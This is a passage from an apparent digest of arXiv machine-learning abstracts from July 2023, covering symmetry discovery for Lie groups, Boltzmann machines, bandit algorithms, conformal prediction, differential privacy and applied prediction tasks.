    Recent work has applied supervised deep learning to derive continuous symmetry transformations that preserve the data labels and to obtain the corresponding algebras of symmetry generators. This letter introduces two improved algorithms that significantly speed up the discovery of these symmetry transformations. The new methods are demonstrated by deriving the complete set of generators for the unitary groups U(n) and the exceptional Lie groups $G_2$, $F_4$, and $E_6$. A third post-processing algorithm renders the found generators in sparse form. We benchmark the performance improvement of the new algorithms relative to the standard approach. Given the significant complexity of the exceptional Lie groups, our results demonstrate that this machine-learning method for discovering symmetries is completely general and can be applied to a wide variety of labeled datasets.  ( 2 min )
    Monotone deep Boltzmann machines. (arXiv:2307.04990v1 [cs.LG])
Deep Boltzmann machines (DBMs), one of the first "deep" learning methods ever studied, are multi-layered probabilistic models governed by a pairwise energy function that describes the likelihood of all variables/nodes in the network. In practice, DBMs are often constrained, i.e., via the restricted Boltzmann machine (RBM) architecture (which does not permit intra-layer connections), in order to allow for more efficient inference. In this work, we revisit the generic DBM approach, and ask the question: are there other possible restrictions to their design that would enable efficient (approximate) inference? In particular, we develop a new class of restricted model, the monotone DBM, which allows for arbitrary self-connection in each layer, but restricts the weights in a manner that guarantees the existence and global uniqueness of a mean-field fixed point. To do this, we leverage tools from the recently-proposed monotone Deep Equilibrium model and show that a particular choice of activation results in a fixed-point iteration that gives a variational mean-field solution. While this approach is still largely conceptual, it is the first architecture that allows for efficient approximate inference in fully-general weight structures for DBMs. We apply this approach to simple deep convolutional Boltzmann architectures and demonstrate that it allows for tasks such as the joint completion and classification of images, within a single deep probabilistic setting, while avoiding the pitfalls of mean-field inference in traditional RBMs.  ( 2 min )
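The existence-and-uniqueness guarantee for a mean-field fixed point can be illustrated with a tiny iteration (an illustrative sketch under a crude contraction assumption, not the paper's monotone-operator parameterization): when the weight matrix is small enough in norm, iterating $z \leftarrow \sigma(Wz + b)$ converges to the same fixed point from any initialization.

```python
import math

def mean_field_fixed_point(W, b, iters=200):
    """Iterate z <- sigmoid(W z + b) to a fixed point.

    Since the sigmoid's slope is at most 1/4, a sufficiently small weight
    matrix makes the map a contraction, so the fixed point exists and is
    unique regardless of the starting point."""
    sigmoid = lambda t: 1.0 / (1.0 + math.exp(-t))
    z = [0.5] * len(b)
    for _ in range(iters):
        z = [sigmoid(sum(W[i][j] * z[j] for j in range(len(z))) + b[i])
             for i in range(len(b))]
    return z

W = [[0.2, -0.1], [0.1, 0.3]]   # small norm -> contraction
b = [0.0, 0.5]
z = mean_field_fixed_point(W, b)
# Residual of the fixed-point equation z = sigmoid(W z + b):
residual = max(
    abs(z[i] - 1.0 / (1.0 + math.exp(-(sum(W[i][j] * z[j] for j in range(2)) + b[i]))))
    for i in range(2))
```

The paper's contribution is a weight restriction that secures this guarantee for far richer structures than a brute norm bound, including arbitrary intra-layer connections.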
    Human Emotion Recognition Based On Galvanic Skin Response signal Feature Selection and SVM. (arXiv:2307.05383v1 [eess.SP])
A novel human emotion recognition method based on automatically selected Galvanic Skin Response (GSR) signal features and an SVM is proposed in this paper. GSR signals were acquired with the e-Health Sensor Platform V2.0. The data are then de-noised with a wavelet function and normalized to remove individual differences. 30 features are extracted from the normalized data; however, directly using these features leads to a low recognition rate. To obtain an optimized feature set, a covariance-based feature selection is employed in our method. Finally, an SVM taking the optimized features as input is used to perform human emotion recognition. The experimental results indicate that the proposed method achieves good human emotion recognition, with a recognition accuracy above 66.67%.  ( 2 min )
    A physics-constrained machine learning method for mapping gapless land surface temperature. (arXiv:2307.04817v1 [physics.ao-ph])
More accurate, spatio-temporally complete, and physically consistent land surface temperature (LST) estimation has been a main interest in Earth system research. Developing physics-driven mechanism models and data-driven machine learning (ML) models are two major paradigms for gapless LST estimation, each with its respective advantages and disadvantages. In this paper, a physics-constrained ML model, which combines the strengths of mechanism models and ML models, is proposed to generate gapless LST with physical meaning and high accuracy. The hybrid model employs ML as the primary architecture, into which physical constraints on the input variables are incorporated to enhance the interpretability and extrapolation ability of the model. Specifically, the light gradient-boosting machine (LGBM) model, which uses only remote sensing data as input, serves as the pure ML model. Physical constraints (PCs) are coupled by further incorporating key Community Land Model (CLM) forcing data (cause) and CLM simulation data (effect) as inputs into the LGBM model. This integration forms the PC-LGBM model, which incorporates surface energy balance (SEB) constraints underlying the data in CLM-LST modeling within a biophysical framework. Compared with a pure physical method and pure ML methods, the PC-LGBM model improves the prediction accuracy and physical interpretability of LST. It also demonstrates good extrapolation ability in response to extreme weather cases, suggesting that the PC-LGBM model enables not only empirical learning from data but also rational derivation from theory. The proposed method represents an innovative way to map accurate and physically interpretable gapless LST, and could provide insights to accelerate knowledge discovery in land surface processes and data mining in geographical parameter estimation.  ( 3 min )
    Predicting Outcomes in Long COVID Patients with Spatiotemporal Attention. (arXiv:2307.04770v1 [cs.LG])
Long COVID is a general term for the post-acute sequelae of COVID-19. Patients with long COVID can endure long-lasting symptoms including fatigue, headache, dyspnea, and anosmia. Identifying the cohorts with severe long-term complications of COVID-19 could benefit treatment planning and resource allocation. However, due to the heterogeneous phenotypes presented by long COVID patients, it is difficult to predict their outcomes from their longitudinal data. In this study, we propose a spatiotemporal attention mechanism to weigh feature importance jointly from the temporal dimension and feature space. Considering that medical examinations can have interchangeable orders at adjacent time points, we restrict the learning of short-term dependency with a Local-LSTM and the learning of long-term dependency with the joint spatiotemporal attention. We also compare the proposed method with several state-of-the-art methods and a method used in clinical practice. The methods are evaluated on a hard-to-acquire clinical dataset of patients with long COVID. Experimental results show that the Local-LSTM with joint spatiotemporal attention outperforms related methods in outcome prediction. The proposed method provides a clinical tool for the severity assessment of long COVID.  ( 2 min )
    Collaborative Score Distillation for Consistent Visual Synthesis. (arXiv:2307.04787v1 [cs.CV])
    Generative priors of large-scale text-to-image diffusion models enable a wide range of new generation and editing applications on diverse visual modalities. However, when adapting these priors to complex visual modalities, often represented as multiple images (e.g., video), achieving consistency across a set of images is challenging. In this paper, we address this challenge with a novel method, Collaborative Score Distillation (CSD). CSD is based on the Stein Variational Gradient Descent (SVGD). Specifically, we propose to consider multiple samples as "particles" in the SVGD update and combine their score functions to distill generative priors over a set of images synchronously. Thus, CSD facilitates seamless integration of information across 2D images, leading to a consistent visual synthesis across multiple samples. We show the effectiveness of CSD in a variety of tasks, encompassing the visual editing of panorama images, videos, and 3D scenes. Our results underline the competency of CSD as a versatile method for enhancing inter-sample consistency, thereby broadening the applicability of text-to-image diffusion models.  ( 2 min )
    On Detecting Some Defective Items in Group Testing. (arXiv:2307.04822v1 [cs.DS])
    Group testing is an approach aimed at identifying up to $d$ defective items among a total of $n$ elements. This is accomplished by examining subsets to determine if at least one defective item is present. In our study, we focus on the problem of identifying a subset of $\ell\leq d$ defective items. We develop upper and lower bounds on the number of tests required to detect $\ell$ defective items in both the adaptive and non-adaptive settings while considering scenarios where no prior knowledge of $d$ is available, and situations where an estimate of $d$ or at least some non-trivial upper bound on $d$ is available. When no prior knowledge on $d$ is available, we prove a lower bound of $ \Omega(\frac{\ell \log^2n}{\log \ell +\log\log n})$ tests in the randomized non-adaptive settings and an upper bound of $O(\ell \log^2 n)$ for the same settings. Furthermore, we demonstrate that any non-adaptive deterministic algorithm must ask $\Theta(n)$ tests, signifying a fundamental limitation in this scenario. For adaptive algorithms, we establish tight bounds in different scenarios. In the deterministic case, we prove a tight bound of $\Theta(\ell\log{(n/\ell)})$. Moreover, in the randomized settings, we derive a tight bound of $\Theta(\ell\log{(n/d)})$. When $d$, or at least some non-trivial estimate of $d$, is known, we prove a tight bound of $\Theta(d\log (n/d))$ for the deterministic non-adaptive settings, and $\Theta(\ell\log(n/d))$ for the randomized non-adaptive settings. In the adaptive case, we present an upper bound of $O(\ell \log (n/\ell))$ for the deterministic settings, and a lower bound of $\Omega(\ell\log(n/d)+\log n)$. Additionally, we establish a tight bound of $\Theta(\ell \log(n/d))$ for the randomized adaptive settings.  ( 3 min )
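A standard randomized non-adaptive design with COMP decoding makes the setting concrete (a textbook-style sketch, not the paper's algorithms): each test pools each item independently with probability p, and every item appearing in a negative test is cleared, so the true defectives always survive in the candidate set.

```python
import random

def comp_group_testing(n, defectives, num_tests, p, seed=0):
    """Random non-adaptive group testing with COMP decoding.

    Each test includes each item independently with probability p; a test
    is positive iff it contains a defective. COMP clears every item that
    appears in some negative test, so the defectives are guaranteed to be
    a subset of the returned candidates; with O(d log n) tests the two
    sets coincide with high probability."""
    rng = random.Random(seed)
    defectives = set(defectives)
    candidates = set(range(n))
    for _ in range(num_tests):
        pool = {i for i in range(n) if rng.random() < p}
        if not pool & defectives:          # negative test
            candidates -= pool             # everyone in it is clean
    return candidates

candidates = comp_group_testing(n=100, defectives={3, 41, 77},
                                num_tests=150, p=1 / 3)
```

The paper's question is subtler: detecting only $\ell \le d$ of the defectives, which the bounds above show can be strictly cheaper than full recovery.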
    Comparison of Point Cloud and Image-based Models for Calorimeter Fast Simulation. (arXiv:2307.04780v1 [cs.LG])
Score-based generative models are a new class of generative models that have been shown to accurately generate high-dimensional calorimeter datasets. Recent advances in generative models have used images with 3D voxels to represent and model complex calorimeter showers. Point clouds, however, are likely a more natural representation of calorimeter showers, particularly in calorimeters with high granularity. Point clouds preserve all of the information of the original simulation, deal more naturally with sparse datasets, and can be implemented with more compact models and data files. In this work, two state-of-the-art score-based models are trained on the same set of calorimeter simulations and directly compared.  ( 2 min )
    Formulating A Strategic Plan Based On Statistical Analyses And Applications For Financial Companies Through A Real-World Use Case. (arXiv:2307.04778v1 [cs.LG])
Business statistics play a crucial role in implementing a data-driven strategic plan at the enterprise level, employing various analytics whose outcomes enable an enterprise to enhance decision-making or mitigate risks to the organization. In this work, a strategic plan informed by statistical analysis is introduced for a financial company called LendingClub; the plan comprises exploring the possibility of onboarding a big data platform along with advanced feature selection capacities. The main objectives of the plan are to increase the company's revenue while reducing the risk of granting loans to borrowers who cannot repay them. In this study, different hypotheses formulated to address the company's concerns are examined, and the results reveal that the loan amount profoundly impacts the number of borrowers who charge off their loans. The proposed strategic plan also includes onboarding advanced analytics such as machine learning technologies that allow the company to build better-generalized, data-driven predictive models.  ( 2 min )
    MentalHealthAI: Utilizing Personal Health Device Data to Optimize Psychiatry Treatment. (arXiv:2307.04777v1 [cs.LG])
    Mental health disorders remain a significant challenge in modern healthcare, with diagnosis and treatment often relying on subjective patient descriptions and past medical history. To address this issue, we propose a personalized mental health tracking and mood prediction system that utilizes patient physiological data collected through personal health devices. Our system leverages a decentralized learning mechanism that combines transfer and federated machine learning concepts using smart contracts, allowing data to remain on users' devices and enabling effective tracking of mental health conditions for psychiatric treatment and management in a privacy-aware and accountable manner. We evaluate our model using a popular mental health dataset that demonstrates promising results. By utilizing connected health systems and machine learning models, our approach offers a novel solution to the challenge of providing psychiatrists with further insight into their patients' mental health outside of traditional office visits.  ( 2 min )
    Digital Twins for Patient Care via Knowledge Graphs and Closed-Form Continuous-Time Liquid Neural Networks. (arXiv:2307.04772v1 [cs.LG])
Digital twin technology is anticipated to transform healthcare, enabling personalized medicine and support, earlier diagnoses, simulated treatment outcomes, and optimized surgical plans. Digital twins are readily gaining traction in industries like manufacturing, supply chain logistics, and civil infrastructure. Not in patient care, however. The challenge of modeling complex diseases with multimodal patient data and the computational complexity of analyzing it have stifled digital twin adoption in the biomedical vertical. Yet, these major obstacles can potentially be handled by approaching these models in a different way. This paper proposes a novel framework for addressing the barriers to clinical twin modeling created by computational costs and modeling complexities. We propose structuring patient health data as a knowledge graph and using closed-form continuous-time liquid neural networks for real-time analytics. By synthesizing multimodal patient data and leveraging the flexibility and efficiency of closed-form continuous-time networks and knowledge graph ontologies, our approach enables real-time insights, personalized medicine, early diagnosis and intervention, and optimal surgical planning. This novel approach provides a comprehensive and adaptable view of patient health along with real-time analytics, paving the way for digital twin simulations and other anticipated benefits in healthcare.  ( 2 min )
    Optimal Algorithms for Latent Bandits with Cluster Structure. (arXiv:2301.07040v3 [cs.LG] UPDATED)
We consider the problem of latent bandits with cluster structure, where there are multiple users, each with an associated multi-armed bandit problem. These users are grouped into latent clusters such that the mean reward vectors of users within the same cluster are identical. At each round, a user, selected uniformly at random, pulls an arm and observes a corresponding noisy reward. The goal of the users is to maximize their cumulative rewards. This problem is central to practical recommendation systems and has received wide attention of late (Gentile et al., 2014; Maillard and Mannor, 2014). Now, if each user acts independently, then they would have to explore each arm independently and a regret of $\Omega(\sqrt{\mathsf{MNT}})$ is unavoidable, where $\mathsf{M}, \mathsf{N}$ are the number of arms and users, respectively. Instead, we propose LATTICE (Latent bAndiTs via maTrIx ComplEtion), which exploits the latent cluster structure to provide the minimax-optimal regret of $\widetilde{O}(\sqrt{(\mathsf{M}+\mathsf{N})\mathsf{T}})$ when the number of clusters is $\widetilde{O}(1)$. This is the first algorithm to guarantee such a strong regret bound. LATTICE is based on a careful exploitation of arm information within a cluster while simultaneously clustering users. Furthermore, it is computationally efficient and requires only $O(\log{\mathsf{T}})$ calls to an offline matrix completion oracle across all $\mathsf{T}$ rounds.
    Conformalization of Sparse Generalized Linear Models. (arXiv:2307.05109v1 [cs.LG])
    Given a sequence of observable variables $\{(x_1, y_1), \ldots, (x_n, y_n)\}$, the conformal prediction method estimates a confidence set for $y_{n+1}$ given $x_{n+1}$ that is valid for any finite sample size by merely assuming that the joint distribution of the data is permutation invariant. Although attractive, computing such a set is computationally infeasible in most regression problems. Indeed, in these cases, the unknown variable $y_{n+1}$ can take an infinite number of possible candidate values, and generating conformal sets requires retraining a predictive model for each candidate. In this paper, we focus on a sparse linear model with only a subset of variables for prediction and use numerical continuation techniques to approximate the solution path efficiently. The critical property we exploit is that the set of selected variables is invariant under a small perturbation of the input data. Therefore, it is sufficient to enumerate and refit the model only at the change points of the set of active features and smoothly interpolate the rest of the solution via a Predictor-Corrector mechanism. We show how our path-following algorithm accurately approximates conformal prediction sets and illustrate its performance using synthetic and real data examples.
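The computational burden the paper tackles comes from full conformal prediction, which refits the model for every candidate value. The simpler split-conformal variant below avoids refitting entirely at the cost of a data split (an illustrative sketch of the baseline idea, not the paper's path-following algorithm).

```python
import math

def split_conformal_interval(predict, calib, x_new, alpha=0.1):
    """Split conformal prediction interval for a fitted regressor.

    `predict` is any point predictor fitted on data disjoint from `calib`,
    a list of held-out (x, y) pairs. The interval is the prediction plus or
    minus the ceil((1-alpha)(m+1))-th smallest calibration residual, which
    gives finite-sample 1-alpha coverage under exchangeability."""
    residuals = sorted(abs(y - predict(x)) for x, y in calib)
    m = len(residuals)
    rank = min(m, math.ceil((1 - alpha) * (m + 1)))
    q = residuals[rank - 1]
    pred = predict(x_new)
    return pred - q, pred + q

# Toy model y ~ 2x with a deterministic "noise" pattern on calibration data.
def predict_model(x):
    return 2.0 * x

calib = [(x, 2.0 * x + ((-1) ** x) * 0.1 * (x % 5)) for x in range(40)]
lo, hi = split_conformal_interval(predict_model, calib, x_new=10.0)
```

Full conformal avoids the split but, as the abstract notes, naively requires one refit per candidate $y_{n+1}$; the paper's contribution is interpolating the sparse-model solution path so that refits are only needed at change points of the active set.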
    Differentially Private Statistical Inference through $\beta$-Divergence One Posterior Sampling. (arXiv:2307.05194v1 [stat.ML])
    Differential privacy guarantees allow the results of a statistical analysis involving sensitive data to be released without compromising the privacy of any individual taking part. Achieving such guarantees generally requires the injection of noise, either directly into parameter estimates or into the estimation process. Instead of artificially introducing perturbations, sampling from Bayesian posterior distributions has been shown to be a special case of the exponential mechanism, producing consistent, and efficient private estimates without altering the data generative process. The application of current approaches has, however, been limited by their strong bounding assumptions which do not hold for basic models, such as simple linear regressors. To ameliorate this, we propose $\beta$D-Bayes, a posterior sampling scheme from a generalised posterior targeting the minimisation of the $\beta$-divergence between the model and the data generating process. This provides private estimation that is generally applicable without requiring changes to the underlying model and consistently learns the data generating parameter. We show that $\beta$D-Bayes produces more precise inference estimation for the same privacy guarantees, and further facilitates differentially private estimation via posterior sampling for complex classifiers and continuous regression models such as neural networks for the first time.
    Hybrid hidden Markov LSTM for short-term traffic flow prediction. (arXiv:2307.04954v1 [cs.LG])
Deep learning (DL) methods have outperformed parametric models such as the historical average, ARIMA and its variants in predicting traffic variables into the short and near-short-term future, which is critical for traffic management. Specifically, recurrent neural networks (RNNs) and their variants (e.g. long short-term memory) are designed to retain long-term temporal correlations and are therefore suitable for modeling sequences. In contrast, multi-regime models assume the traffic system to evolve through multiple states (say, free flow and congestion) with distinct characteristics, and hence separate models are trained to characterize the traffic dynamics within each regime. For instance, Markov-switching models with a hidden Markov model (HMM) for regime identification are capable of capturing complex dynamic patterns and non-stationarity. Interestingly, both HMM and LSTM can be used for modeling an observation sequence from a set of latent, or hidden, state variables. In LSTM, the latent variable is computed deterministically from the current observation and the previous latent variable, while in HMM the set of latent variables forms a Markov chain. Inspired by research in natural language processing, a hybrid hidden Markov-LSTM model capable of learning complementary features in traffic data is proposed for traffic flow prediction. Results indicate significant performance gains from the hybrid architecture compared to conventional methods such as Markov-switching ARIMA and LSTM.
    Diagnosing Model Performance Under Distribution Shift. (arXiv:2303.02011v4 [stat.ML] UPDATED)
    Prediction models can perform poorly when deployed to target distributions different from the training distribution. To understand these operational failure modes, we develop a method, called DIstribution Shift DEcomposition (DISDE), to attribute a drop in performance to different types of distribution shifts. Our approach decomposes the performance drop into terms for 1) an increase in harder but frequently seen examples from training, 2) changes in the relationship between features and outcomes, and 3) poor performance on examples infrequent or unseen during training. These terms are defined by fixing a distribution on $X$ while varying the conditional distribution of $Y \mid X$ between training and target, or by fixing the conditional distribution of $Y \mid X$ while varying the distribution on $X$. In order to do this, we define a hypothetical distribution on $X$ consisting of values common in both training and target, over which it is easy to compare $Y \mid X$ and thus predictive performance. We estimate performance on this hypothetical distribution via reweighting methods. Empirically, we show how our method can 1) inform potential modeling improvements across distribution shifts for employment prediction on tabular census data, and 2) help to explain why certain domain adaptation methods fail to improve model performance for satellite image classification.
    MAP- and MLE-Based Teaching. (arXiv:2307.05252v1 [cs.LG])
    Imagine a learner L who tries to infer a hidden concept from a collection of observations. Building on the work [4] of Ferri et al., we assume the learner to be parameterized by priors P(c) and by c-conditional likelihoods P(z|c) where c ranges over all concepts in a given class C and z ranges over all observations in an observation set Z. L is called a MAP-learner (resp. an MLE-learner) if it thinks of a collection S of observations as a random sample and returns the concept with the maximum a-posteriori probability (resp. the concept which maximizes the c-conditional likelihood of S). Depending on whether L assumes that S is obtained from ordered or unordered sampling resp. from sampling with or without replacement, we can distinguish four different sampling modes. Given a target concept c in C, a teacher for a MAP-learner L aims at finding a smallest collection of observations that causes L to return c. This approach leads in a natural manner to various notions of a MAP- or MLE-teaching dimension of a concept class C. Our main results are: We show that this teaching model has some desirable monotonicity properties. We clarify how the four sampling modes are related to each other. As for the (important!) special case, where concepts are subsets of a domain and observations are 0,1-labeled examples, we obtain some additional results. First of all, we characterize the MAP- and MLE-teaching dimension associated with an optimally parameterized MAP-learner graph-theoretically. From this central result, some other ones are easy to derive. It is shown, for instance, that the MLE-teaching dimension is either equal to the MAP-teaching dimension or exceeds the latter by 1. It is shown furthermore that these dimensions can be bounded from above by the so-called antichain number, the VC-dimension and related combinatorial parameters. Moreover they can be computed in polynomial time.
    Normalized mutual information is a biased measure for classification and community detection. (arXiv:2307.01282v1 [cs.SI] CROSS LISTED)
    Normalized mutual information is widely used as a similarity measure for evaluating the performance of clustering and classification algorithms. In this paper, we show that results returned by the normalized mutual information are biased for two reasons: first, because they ignore the information content of the contingency table and, second, because their symmetric normalization introduces spurious dependence on algorithm output. We introduce a modified version of the mutual information that remedies both of these shortcomings. As a practical demonstration of the importance of using an unbiased measure, we perform extensive numerical tests on a basket of popular algorithms for network community detection and show that one's conclusions about which algorithm is best are significantly affected by the biases in the traditional mutual information.
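A minimal from-scratch sketch of the standard symmetrically normalized mutual information being critiqued here, computed from the contingency table; the toy labelings are invented:

```python
import numpy as np

def nmi(a, b):
    """Plain symmetrically normalized mutual information (the measure under critique)."""
    a, b = np.asarray(a), np.asarray(b)
    n = len(a)
    ca, cb = np.unique(a), np.unique(b)
    # Joint label distribution (contingency table divided by n).
    C = np.array([[np.sum((a == i) & (b == j)) for j in cb] for i in ca]) / n
    pa, pb = C.sum(axis=1), C.sum(axis=0)
    nz = C > 0
    mi = np.sum(C[nz] * np.log(C[nz] / np.outer(pa, pb)[nz]))
    ha, hb = -np.sum(pa * np.log(pa)), -np.sum(pb * np.log(pb))
    return 2 * mi / (ha + hb)

print(nmi([0, 0, 1, 1], [1, 1, 0, 0]))  # 1.0: invariant to relabeling
print(nmi([0, 0, 1, 1], [0, 1, 0, 1]))  # 0.0: independent labelings
```

The symmetric normalization `2 * mi / (ha + hb)` is the second source of bias the paper identifies, since it makes the score depend on the entropy of the algorithm's own output.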
    Robust Inference of Manifold Density and Geometry by Doubly Stochastic Scaling. (arXiv:2209.08004v2 [math.ST] UPDATED)
    The Gaussian kernel and its traditional normalizations (e.g., row-stochastic) are popular approaches for assessing similarities between data points. Yet, they can be inaccurate under high-dimensional noise, especially if the noise magnitude varies considerably across the data, e.g., under heteroskedasticity or outliers. In this work, we investigate a more robust alternative -- the doubly stochastic normalization of the Gaussian kernel. We consider a setting where points are sampled from an unknown density on a low-dimensional manifold embedded in high-dimensional space and corrupted by possibly strong, non-identically distributed, sub-Gaussian noise. We establish that the doubly stochastic affinity matrix and its scaling factors concentrate around certain population forms, and provide corresponding finite-sample probabilistic error bounds. We then utilize these results to develop several tools for robust inference under general high-dimensional noise. First, we derive a robust density estimator that reliably infers the underlying sampling density and can substantially outperform the standard kernel density estimator under heteroskedasticity and outliers. Second, we obtain estimators for the pointwise noise magnitudes, the pointwise signal magnitudes, and the pairwise Euclidean distances between clean data points. Lastly, we derive robust graph Laplacian normalizations that accurately approximate various manifold Laplacians, including the Laplace Beltrami operator, improving over traditional normalizations in noisy settings. We exemplify our results in simulations and on real single-cell RNA-sequencing data. For the latter, we show that in contrast to traditional methods, our approach is robust to variability in technical noise levels across cell types.
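The doubly stochastic normalization can be sketched with a symmetric Sinkhorn iteration; the bandwidth, point cloud, and iteration count below are arbitrary choices for illustration, not the paper's prescriptions:

```python
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(50, 2))           # invented point cloud

eps = 1.0                              # bandwidth: an arbitrary choice here
D2 = ((X[:, None, :] - X[None, :, :]) ** 2).sum(-1)
K = np.exp(-D2 / eps)                  # Gaussian kernel

# Symmetric Sinkhorn scaling: find d with d_i * (K d)_i = 1, so that
# W = diag(d) K diag(d) is doubly stochastic.
d = np.ones(len(X))
for _ in range(2000):
    d = np.sqrt(d / (K @ d))
W = d[:, None] * K * d[None, :]
print(W.sum(axis=1)[:3])               # each row (and column) sums to ~1
```

The scaling factors `d` are the quantities the paper shows concentrate around population forms, which is what makes the normalization robust to heteroskedastic noise.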
    Selective Sampling and Imitation Learning via Online Regression. (arXiv:2307.04998v1 [cs.LG])
We consider the problem of Imitation Learning (IL) by actively querying a noisy expert for feedback. While imitation learning has been empirically successful, much of prior work assumes access to noiseless expert feedback which is not practical in many applications. In fact, when one only has access to noisy expert feedback, algorithms that rely on purely offline data (non-interactive IL) can be shown to need a prohibitively large number of samples to be successful. In contrast, in this work, we provide an interactive algorithm for IL that uses selective sampling to actively query the noisy expert for feedback. Our contributions are twofold: First, we provide a new selective sampling algorithm that works with general function classes and multiple actions, and obtains the best-known bounds for the regret and the number of queries. Next, we extend this analysis to the problem of IL with noisy expert feedback and provide a new IL algorithm that makes limited queries. Our algorithm for selective sampling leverages function approximation, and relies on an online regression oracle w.r.t.~the given model class to predict actions, and to decide whether to query the expert for its label. On the theoretical side, the regret bound of our algorithm is upper bounded by the regret of the online regression oracle, while the query complexity additionally depends on the eluder dimension of the model class. We complement this with a lower bound that demonstrates that our results are tight. We extend our selective sampling algorithm for IL with general function approximation and provide bounds on both the regret and the number of queries made to the noisy expert. A key novelty here is that our regret and query complexity bounds only depend on the number of times the optimal policy (and not the noisy expert or the learner) goes to states that have a small margin.
    The Statistical Complexity of Interactive Decision Making. (arXiv:2112.13487v3 [cs.LG] UPDATED)
    A fundamental challenge in interactive learning and decision making, ranging from bandit problems to reinforcement learning, is to provide sample-efficient, adaptive learning algorithms that achieve near-optimal regret. This question is analogous to the classical problem of optimal (supervised) statistical learning, where there are well-known complexity measures (e.g., VC dimension and Rademacher complexity) that govern the statistical complexity of learning. However, characterizing the statistical complexity of interactive learning is substantially more challenging due to the adaptive nature of the problem. The main result of this work provides a complexity measure, the Decision-Estimation Coefficient, that is proven to be both necessary and sufficient for sample-efficient interactive learning. In particular, we provide: 1. a lower bound on the optimal regret for any interactive decision making problem, establishing the Decision-Estimation Coefficient as a fundamental limit. 2. a unified algorithm design principle, Estimation-to-Decisions (E2D), which transforms any algorithm for supervised estimation into an online algorithm for decision making. E2D attains a regret bound that matches our lower bound up to dependence on a notion of estimation performance, thereby achieving optimal sample-efficient learning as characterized by the Decision-Estimation Coefficient. Taken together, these results constitute a theory of learnability for interactive decision making. When applied to reinforcement learning settings, the Decision-Estimation Coefficient recovers essentially all existing hardness results and lower bounds. More broadly, the approach can be viewed as a decision-theoretic analogue of the classical Le Cam theory of statistical estimation; it also unifies a number of existing approaches -- both Bayesian and frequentist.
    Realising Synthetic Active Inference Agents, Part II: Variational Message Updates. (arXiv:2306.02733v2 [stat.ML] UPDATED)
    The Free Energy Principle (FEP) describes (biological) agents as minimising a variational Free Energy (FE) with respect to a generative model of their environment. Active Inference (AIF) is a corollary of the FEP that describes how agents explore and exploit their environment by minimising an expected FE objective. In two related papers, we describe a scalable, epistemic approach to synthetic AIF agents, by message passing on free-form Forney-style Factor Graphs (FFGs). A companion paper (part I) introduces a Constrained FFG (CFFG) notation that visually represents (generalised) FE objectives for AIF. The current paper (part II) derives message passing algorithms that minimise (generalised) FE objectives on a CFFG by variational calculus. A comparison between simulated Bethe and generalised FE agents illustrates how synthetic AIF induces epistemic behaviour on a T-maze navigation task. With a full message passing account of synthetic AIF agents, it becomes possible to derive and reuse message updates across models and move closer to industrial applications of synthetic AIF.
    Randomized Exploration in Generalized Linear Bandits. (arXiv:1906.08947v3 [cs.LG] UPDATED)
    We study two randomized algorithms for generalized linear bandits. The first, GLM-TSL, samples a generalized linear model (GLM) from the Laplace approximation to the posterior distribution. The second, GLM-FPL, fits a GLM to a randomly perturbed history of past rewards. We analyze both algorithms and derive $\tilde{O}(d \sqrt{n \log K})$ upper bounds on their $n$-round regret, where $d$ is the number of features and $K$ is the number of arms. The former improves on prior work while the latter is the first for Gaussian noise perturbations in non-linear models. We empirically evaluate both GLM-TSL and GLM-FPL in logistic bandits, and apply GLM-FPL to neural network bandits. Our work showcases the role of randomization, beyond posterior sampling, in exploration.
    Tracking Most Significant Shifts in Nonparametric Contextual Bandits. (arXiv:2307.05341v1 [stat.ML])
We study nonparametric contextual bandits where Lipschitz mean reward functions may change over time. We first establish the minimax dynamic regret rate in this less understood setting in terms of the number of changes $L$ and total variation $V$, both capturing all changes in distribution over context space, and argue that state-of-the-art procedures are suboptimal in this setting. Next, we turn to the question of adaptivity for this setting, i.e. achieving the minimax rate without knowledge of $L$ or $V$. Quite importantly, we posit that the bandit problem, viewed locally at a given context $X_t$, should not be affected by reward changes in other parts of context space $\cal X$. We therefore propose a notion of change, which we term experienced significant shifts, that better accounts for locality, and thus counts considerably fewer changes than $L$ and $V$. Furthermore, similar to recent work on non-stationary MAB (Suk & Kpotufe, 2022), experienced significant shifts only count the most significant changes in mean rewards, e.g., severe best-arm changes relevant to observed contexts. Our main result is to show that this more tolerant notion of change can in fact be adapted to.
    Prediction intervals for neural network models using weighted asymmetric loss functions. (arXiv:2210.04318v4 [stat.ML] UPDATED)
We propose a simple and efficient approach to generate prediction intervals (PIs) for approximated and forecasted trends. Our method leverages a weighted asymmetric loss function to estimate the lower and upper bounds of the PI, with the weights determined by the interval's coverage probability. We provide a concise mathematical proof of the method, show how it can be extended to derive PIs for parametrised functions, and argue why the method works for predicting PIs of dependent variables. The presented tests of the method on a real-world forecasting task using a neural network-based model show that it can produce reliable PIs in complex machine learning scenarios.
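The weighted asymmetric (pinball) loss idea can be illustrated on a constant predictor: minimizing the tau-weighted loss recovers the empirical tau-quantile, which is what makes it usable for interval bounds. The grid search and Gaussian sample below are invented for illustration:

```python
import numpy as np

def pinball(y, q, tau):
    """Weighted asymmetric loss: errors above q weighted by tau, below by 1 - tau."""
    e = y - q
    return np.mean(np.maximum(tau * e, (tau - 1) * e))

rng = np.random.default_rng(0)
y = rng.normal(size=5000)          # invented data

# Minimizing the tau-pinball loss over a grid recovers the empirical
# tau-quantile; fitting an upper bound at tau = 0.95 and a lower bound at
# tau = 0.05 would yield a ~90% prediction interval.
grid = np.linspace(-3, 3, 601)
q90 = grid[np.argmin([pinball(y, g, 0.9) for g in grid])]
print(q90, np.quantile(y, 0.9))    # the two agree up to grid resolution
```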
    Stochastic Nested Compositional Bi-level Optimization for Robust Feature Learning. (arXiv:2307.05384v1 [math.OC])
    We develop and analyze stochastic approximation algorithms for solving nested compositional bi-level optimization problems. These problems involve a nested composition of $T$ potentially non-convex smooth functions in the upper-level, and a smooth and strongly convex function in the lower-level. Our proposed algorithm does not rely on matrix inversions or mini-batches and can achieve an $\epsilon$-stationary solution with an oracle complexity of approximately $\tilde{O}_T(1/\epsilon^{2})$, assuming the availability of stochastic first-order oracles for the individual functions in the composition and the lower-level, which are unbiased and have bounded moments. Here, $\tilde{O}_T$ hides polylog factors and constants that depend on $T$. The key challenge we address in establishing this result relates to handling three distinct sources of bias in the stochastic gradients. The first source arises from the compositional nature of the upper-level, the second stems from the bi-level structure, and the third emerges due to the utilization of Neumann series approximations to avoid matrix inversion. To demonstrate the effectiveness of our approach, we apply it to the problem of robust feature learning for deep neural networks under covariate shift, showcasing the benefits and advantages of our methodology in that context.
